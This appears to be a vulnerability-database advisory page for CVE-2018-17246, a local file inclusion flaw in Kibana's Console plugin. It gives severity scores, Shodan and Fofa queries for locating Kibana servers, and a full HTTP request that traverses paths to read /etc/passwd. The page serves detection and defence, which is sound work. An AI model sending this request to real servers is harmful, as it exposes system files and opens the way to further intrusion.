🔙 목록으로 돌아가기

CVE-2018-17246: Kibana - Local File Inclusion

TitleKibana - Local File Inclusion
Authorprincechaddha,thelicato
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.
RemediationApply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.93783
CVE IDCVE-2018-17246
CWE IDCWE-829,CWE-73
Shodan Queryhttp.title:"kibana"
Fofa Querytitle="kibana"
Tags cve cve2018 lfi kibana vulhub elastic vkev vuln

🔍 Vulnerability Description

Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

🌐 HTTP Request

GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)  Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-17246.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-17246.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A